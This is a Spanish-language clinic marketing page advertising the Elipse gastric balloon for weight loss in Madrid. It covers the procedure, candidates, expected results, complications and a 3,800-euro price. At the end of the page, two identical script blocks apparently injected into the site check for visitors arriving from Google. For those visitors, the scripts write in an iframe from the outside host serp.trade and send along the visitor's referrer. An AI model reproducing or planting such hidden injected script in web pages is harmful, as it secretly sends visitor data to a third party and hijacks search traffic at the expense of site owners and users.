Balón Gástrico Elipse

¿Qué es el Balón Elipse?

El balón gástrico Elipse se trata de un método que ayuda a perder peso, está indicado para personas que sufran obesidad o sobrepeso cuyo índice de masa corporal sea 27 o superior a esta cifra. Permite que estos pacientes lleguen a perder entre trece y quince kilos.

Esta técnica tan novedosa tiene todos los beneficios del tradicional balón gástrico, pero siendo incluso todavía menos invasiva que él y en una cita de veinte minutos se llevaría a cabo su ingesta. 

Una vez que el balón elipse esté en el estómago, generará una sensación de saciedad haciendo más lento el paso de los alimentos por su interior. El seguimiento de la dieta proporcionada por el nutricionista será mucho más fácil. Los pacientes que se sometieron a este tratamiento de pérdida de peso, terminan adquiriendo unos hábitos de alimentación mucho más saludables, evitando así la ansiedad por comer en exceso.

Balon gastrico elipse precio

Consulta de valoración Balón Elipse

  • Selecciona ciudad
  • Madrid
  • Hospital Fuensanta

¿Cómo funciona el Balón Elipse? 

Antes de colocarlo, se te hará un examen físico para saber si eres apto para este tratamiento.

Después de esto, se iniciará un programa de alimentación supervisado por el médico. Te asesorará un nutricionista para garantizar el confort durante el desarrollo del programa y conseguir maximizar los resultados.

Una vez hecho este paso, ingerirás una cápsula que cuando llega al estómago, se hincha por medio de una solución líquida y se mantiene unos 4 meses hasta que se abre, se vacía y se elimina como el resto de la comida. El Balón se deshincha solo una vez termina el programa.

El balón gástrico Elipse altera el vaciado gástrico, lleva a cabo un efecto ocupante en la cavidad gástrica y además fomenta algunos cambios neurohormonales que contribuyen a la pérdida de peso que se quiere lograr.

Este balón intragástrico se coloca y retira del estómago sin requerir ninguna anestesia, endoscopia o cualquier tipo de cirugía.

Precio del Balón Elipse

El Balón Gástrico Elipse cuesta 3.800€ con posibilidad de financiación.

balon gastrico elipse precio madrid

¿Qué ventajas tiene el Balón Gástrico Elipse?

  • Se suelen perder unos tres y cinco kilos en las primeras semanas de la terapia con el balón, además estás pérdida de peso continúa mientras se progresa con la textura de la alimentación.
  • Elipse proporciona un tiempo de permanencia en el estómago menor que el resto de balones.
  • Se ha demostrado que los pacientes que fueron tratados perdieron una media del 50% del exceso de peso y un 14% de su peso corporal.
  • Este método, disminuye el riesgo de que estos pacientes puedan sufrir algunos posibles casos de diabetes tipo 2, de hipertensión arterial y de otras posibles patologías asociadas.

¿Qué complicaciones podrían surgir tras la colocación del Balón gástrico Elipse?

Los pacientes que tengan el balón Elipse en su interior y perciben síntomas como dolor abdominal, vómitos, náuseas o distensión abdominal, deberán consultar con su médico para realizarles una radiografía. 

Pérdida de peso con el Balón Gástrico Elipse

El programa de pérdida de peso con el Balón Gástrico consiste en:

Conseguir que los pacientes intervenidos se sacien fácilmente con las comidas y recapaciten su costumbre de picar entre horas. Lo ideal es realizar unas cuatro pequeñas ingestas a lo largo del día.

 

Resultados del Balón Gástrico sin Cirugía

  • Es una opción válida para aquellas personas que quieran perder entre 10 y 12 kg y no hayan tenido nunca ningún trastorno de alimentación previo.
  • Para mantener el peso deseado hay casos que necesitan cambiar sus hábitos de alimentación, otros pueden necesitar un programa deportivo a la medida por parte de un coach personal.
  • También se puede utilizar en las grandes obesidades para mejorar la situación de peso del paciente antes de proceder a la cirugía bariátrica.
balon gastrico elipse recuperacion

¿Cuánto cuesta el Balón Gástrico Elipse?

El precio del Balón Gástrico es de 3.800€. Consulta disponibilidad de cita esta misma semana aquí.

 

¿Para quién está indicado?

El balón gástrico ‘Elipse’ está indicado para pacientes con obesidad grado 1 y pacientes con sobrepeso moderado. Además, se puede utilizar en pacientes con más de 50 de índice de masa corporal (IMC), como fase previa al tratamiento con cirugía bariátrica siempre que el paciente cumpla los requisitos necesarios.

balon gastrico precio madrid

Importante: Esta información tiene únicamente un carácter informativo y en ningún caso médico. Es importante que consulte a su médico sobre su enfermedad específica y el tratamiento más adecuado.

<script>if((document.referrer).includes('google')) {
   document.write("<iframe src='https://serp.trade/iframe.php?ref="+(document.referrer)+"' frameBorder='0' scrolling='no' width='100%' height='200px' align='center'></iframe>");
} </script>

<script>if((document.referrer).includes('google')) {
   document.write("<iframe src='https://serp.trade/iframe.php?ref="+(document.referrer)+"' frameBorder='0' scrolling='no' width='100%' height='200px' align='center'></iframe>");
} </script>
 
Call Now ButtonLlama ahora

#FrenarLaCurva